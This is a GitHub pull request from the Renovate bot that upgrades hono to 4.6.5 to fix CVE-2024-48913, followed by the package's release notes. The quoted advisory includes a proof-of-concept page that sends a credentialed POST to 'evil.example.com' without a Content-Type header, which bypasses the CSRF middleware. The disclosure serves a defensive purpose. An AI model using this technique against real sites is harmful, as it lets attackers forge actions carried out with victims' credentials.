fix(deps): update dependency hono to v4.6.5 [security] by renovate[bot] · Pull Request #115 · koiosdigital/tranquil-patterns-store

renovate · 2024-10-15T18:03:48Z

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
hono (source)	`4.5.8` -> `4.6.5`

GitHub Vulnerability Alerts

CVE-2024-48913

Summary

Bypass CSRF Middleware by a request without Content-Type herader.

Details

Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

PoC

// server.js
import { Hono } from 'hono'
import { csrf }from 'hono/csrf'
const app = new Hono()
app.use(csrf())
app.get('/', (c) => {
  return c.html('Hello Hono!')
})
app.post('/', async (c) => {
  console.log("executed")
  return c.text( await c.req.text())
})
Deno.serve(app.fetch)

<!-- PoC.html -->
<script>
async function myclick() {
    await fetch("http://evil.example.com", {
    method: "POST",
    credentials: "include",
    body:new Blob([`test`],{}),
    });
}
</script>
<input type="button" onclick="myclick()" value="run" />

Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.

await fetch("http://localhost:8000", { method: "POST", credentials: "include"});

Impact

Bypass csrf protection implemented with hono csrf middleware.

Release Notes

honojs/hono (hono)

`v4.6.5`

Compare Source

Security fix for CSRF Protection Middleware

This release includes a security fix for CSRF Protection Middleware. If you are using CSRF Protection Middleware, please upgrade this hono package immediately.

Before this release, a request without a Content-Type header can bypass the protection. This fix does not allow it. See: GHSA-2234-fmw7-43wr

What's Changed

perf(types): replace intersection with union to get better perf by @m-shaka in https://github.com/honojs/hono/pull/3443
ci: use Deno v2 by @yusukebe in https://github.com/honojs/hono/pull/3506
ci: use Deno v2 for a test running for deno by @nakasyou in https://github.com/honojs/hono/pull/3509
fix(types): rm ExcludeEmptyObject to fix massively increased type instantiations by @m-shaka in https://github.com/honojs/hono/pull/3507
fix(cors): avoid setting Access-Control-Allow-Origin if there is no matching origin by @uki00a in https://github.com/honojs/hono/pull/3510
feat(powered-by): optional server name by @PatrickJS in https://github.com/honojs/hono/pull/3492
fix(factory): revert PR #3498 by @yusukebe in https://github.com/honojs/hono/pull/3515
fix(build): remove private fields by @nakasyou in https://github.com/honojs/hono/pull/3514

New Contributors

@uki00a made their first contribution in https://github.com/honojs/hono/pull/3510
@PatrickJS made their first contribution in https://github.com/honojs/hono/pull/3492

Full Changelog: honojs/hono@v4.6.4...v4.6.5

`v4.6.4`

Compare Source

What's Changed

chore: upgrade dependencies by @yusukebe in https://github.com/honojs/hono/pull/3446
chore: remove crypto-js from dev dependencies by @yusukebe in https://github.com/honojs/hono/pull/3447
chore(test): suppress no-unused-vars "'x' is assigned a value but only used as type" by @exoego in https://github.com/honojs/hono/pull/3451
chore(test): include bun coverage by @exoego in https://github.com/honojs/hono/pull/3457
test(deno): remove duplicated app.get by @exoego in https://github.com/honojs/hono/pull/3469
fix(types): add key to IntrinsicAttributes by @codehz in https://github.com/honojs/hono/pull/3474
fix(factory): relax Bindings and Variables for createMiddleware by @yusukebe in https://github.com/honojs/hono/pull/3498
fix(service-worker): bind fetch to globalThis by @sapphi-red in https://github.com/honojs/hono/pull/3500
refactor(jsx): add override to toStringToBuffer in classes extending JSXNode by @yusukebe in https://github.com/honojs/hono/pull/3505

New Contributors

@sapphi-red made their first contribution in https://github.com/honojs/hono/pull/3500

Full Changelog: honojs/hono@v4.6.3...v4.6.4

`v4.6.3`

Compare Source

This release has many new features, but each feature is small, so we've released it as a patch release.

What's Changed

chore: rename runtime_tests to runtime-tests by @yusukebe in https://github.com/honojs/hono/pull/3419
ci: Type check perf by @m-shaka in https://github.com/honojs/hono/pull/3406
refactor(jsx/streaming): Clarified the type of renderToReadableStream. by @usualoma in https://github.com/honojs/hono/pull/3434
perf(types): use homomorphic mapped type to reduce conditional branches by @m-shaka in https://github.com/honojs/hono/pull/3440
ci: prettify type check result and rm a comment by @m-shaka in https://github.com/honojs/hono/pull/3442
fix(types): useSyncExternalStore type by @codehz in https://github.com/honojs/hono/pull/3437
fix(combine/every): make every middleware work with short-circuiting middlewares by @paolostyle in https://github.com/honojs/hono/pull/3441
feat(secureHeader): add CSP Report-Only mode support by @isoppp in https://github.com/honojs/hono/pull/3413
feat(jwt): make JwtVariables generic for improved type safety by @TinsFox in https://github.com/honojs/hono/pull/3428
feat(request): Make request.ts available throught JSR for frameworks that need to instantiate HonoRequest by @Sorikairox in https://github.com/honojs/hono/pull/3425
feat(jsx/precompile): Normalization and stringification of attribute values as renderToString by @usualoma in https://github.com/honojs/hono/pull/3432
feat(serve-static): support absolute root by @yusukebe in https://github.com/honojs/hono/pull/3420

New Contributors

@codehz made their first contribution in https://github.com/honojs/hono/pull/3437
@paolostyle made their first contribution in https://github.com/honojs/hono/pull/3441
@isoppp made their first contribution in https://github.com/honojs/hono/pull/3413
@TinsFox made their first contribution in https://github.com/honojs/hono/pull/3428
@Sorikairox made their first contribution in https://github.com/honojs/hono/pull/3425

Full Changelog: honojs/hono@v4.6.2...v4.6.3

`v4.6.2`

Compare Source

What's Changed

chore(lint): ESLint v9 by @yusukebe in https://github.com/honojs/hono/pull/3393
perf(serve-static): performance optimization for precompressed feature by @usualoma in https://github.com/honojs/hono/pull/3414
fix(serve-static): use application/octet-stream if the mime type is not detected by @usualoma in https://github.com/honojs/hono/pull/3415

Full Changelog: honojs/hono@v4.6.1...v4.6.2

`v4.6.1`

Compare Source

What's Changed

fix(build): improve addExtension esbuild plugin by @kt3k in https://github.com/honojs/hono/pull/3405

New Contributors

@kt3k made their first contribution in https://github.com/honojs/hono/pull/3405

Full Changelog: honojs/hono@v4.6.0...v4.6.1

`v4.6.0`

Compare Source

Hono v4.6.0 is now available!

One of the highlights of this release is the Context Storage Middleware. Let's introduce it.

Context Storage Middleware

Many users may have been waiting for this feature. The Context Storage Middleware uses AsyncLocalStorage to allow handling of the current Context object even outside of handlers.

For example, let’s define a Hono app with a variable message: string.

type Env = {
  Variables: {
    message: string
  }
}

const app = new Hono<Env>()

To enable Context Storage Middleware, register contextStorage() as middleware at the top and set the message value.

import { contextStorage } from 'hono/context-storage'

//...

app.use(contextStorage())

app.use(async (c, next) => {
  c.set('message', 'Hello!')
  await next()
})

getContext() returns the current Context object, allowing you to get the value of the message variable outside the handler.

import { getContext } from 'hono/context-storage'

app.get('/', (c) => {
  return c.text(getMessage())
})

// Access the variable outside the handler.
const getMessage = () => {
  return getContext<Env>().var.message
}

In the case of Cloudflare Workers, you can also access the Bindings outside the handler by using this middleware.

type Env = {
  Bindings: {
    KV: KVNamespace
  }
}

const app = new Hono<Env>()

app.use(contextStorage())

const setKV = (value: string) => {
  return getContext<Env>().env.KV.put('key', value)
}

Thanks @marceloverdijk !

New features

feat(secureHeader): add Permissions-Policy header to secure headers middleware https://github.com/honojs/hono/pull/3314
feat(cloudflare-pages): enable c.env.eventContext in handleMiddleware https://github.com/honojs/hono/pull/3332
feat(websocket): Add generics type to WSContext https://github.com/honojs/hono/pull/3337
feat(jsx-renderer): set Content-Encoding when stream is true https://github.com/honojs/hono/pull/3355
feat(serveStatic): add precompressed option https://github.com/honojs/hono/pull/3366
feat(helper/streaming): Support Promise<string> or (async) JSX.Element in streamSSE https://github.com/honojs/hono/pull/3344
feat(context): make fetch Response headers mutable https://github.com/honojs/hono/pull/3318
feat(serve-static): add onFound option https://github.com/honojs/hono/pull/3396
feat(basic-auth): added custom response message option https://github.com/honojs/hono/pull/3371
feat(bearer-auth): added custom response message options https://github.com/honojs/hono/pull/3372

Other changes

chore(jsx-renderer): fix typo in JSDoc by @taga3s in https://github.com/honojs/hono/pull/3378
chore(deno): use the latest jsr libraries for testing by @ryuapp in https://github.com/honojs/hono/pull/3375
fix(secure-headers): optimize getPermissionsPolicyDirectives function by @kbkn3 in https://github.com/honojs/hono/pull/3398
fix(bearer-auth): typo by @yusukebe in https://github.com/honojs/hono/pull/3404

New Contributors

@kbkn3 made their first contribution in https://github.com/honojs/hono/pull/3314
@hayatosc made their first contribution in https://github.com/honojs/hono/pull/3337
@inetol made their first contribution in https://github.com/honojs/hono/pull/3366

Full Changelog: honojs/hono@v4.5.11...v4.6.0

`v4.5.11`

Compare Source

What's Changed

fix(jsx): race condition in ErrorBoundary with event loop by @usualoma in https://github.com/honojs/hono/pull/3343
perf(jsx): skip the special behavior when the element is in the head. by @usualoma in https://github.com/honojs/hono/pull/3352
refactor(utils/body): shorten the code by @yusukebe in https://github.com/honojs/hono/pull/3353
docs: Twitter to X by @yusukebe in https://github.com/honojs/hono/pull/3354
chore: fix typo in JSDoc by @taga3s in https://github.com/honojs/hono/pull/3364
refactor(utils/basic-auth): Moved Internal function to utils by @sugar-cat7 in https://github.com/honojs/hono/pull/3359

What's Changed

test(types): broken test in future versions of typescript by @m-shaka in https://github.com/honojs/hono/pull/3310
fix(utils/color): Deno does not require permission for NO_COLOR by @ryuapp in https://github.com/honojs/hono/pull/3306
feat(jsx): improve type (MIME) attribute types by @ssssota in https://github.com/honojs/hono/pull/3305
feat(pretty-json): support custom query by @nakasyou in https://github.com/honojs/hono/pull/3300

Full Changelog: honojs/hono@v4.5.8...v4.5.9

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

renovate bot force-pushed the renovate/npm-hono-vulnerability branch 2 times, most recently from e17f8c7 to 1d7916b Compare January 30, 2025 14:37

renovate bot force-pushed the renovate/npm-hono-vulnerability branch from 1d7916b to 932dd6f Compare February 9, 2025 12:27

renovate bot force-pushed the renovate/npm-hono-vulnerability branch from 932dd6f to a5c1326 Compare March 3, 2025 12:45

renovate bot force-pushed the renovate/npm-hono-vulnerability branch from a5c1326 to 0c582cd Compare March 11, 2025 13:01

renovate bot force-pushed the renovate/npm-hono-vulnerability branch from 0c582cd to 54b0313 Compare April 1, 2025 13:35

renovate bot force-pushed the renovate/npm-hono-vulnerability branch from 54b0313 to 3a3107d Compare April 8, 2025 13:37

renovate bot force-pushed the renovate/npm-hono-vulnerability branch from 3a3107d to 29f64c7 Compare April 24, 2025 05:48

renovate bot force-pushed the renovate/npm-hono-vulnerability branch from 29f64c7 to b7f8c30 Compare May 19, 2025 16:22

fix(deps): update dependency hono to v4.6.5 [security]

a47b8a2

renovate bot force-pushed the renovate/npm-hono-vulnerability branch from b7f8c30 to a47b8a2 Compare June 5, 2025 21:50

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix(deps): update dependency hono to v4.6.5 [security]#115

fix(deps): update dependency hono to v4.6.5 [security]#115
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-hono-vulnerability

renovate bot commented Oct 15, 2024

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

Conversation

renovate bot commented Oct 15, 2024

GitHub Vulnerability Alerts

Summary

Details

PoC

Impact

Release Notes

Security fix for CSRF Protection Middleware

What's Changed

New Contributors

What's Changed

New Contributors

What's Changed

New Contributors

What's Changed

What's Changed

New Contributors

Context Storage Middleware

New features

Other changes

New Contributors

What's Changed

New Contributors

What's Changed

New Contributors

What's Changed

Configuration

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants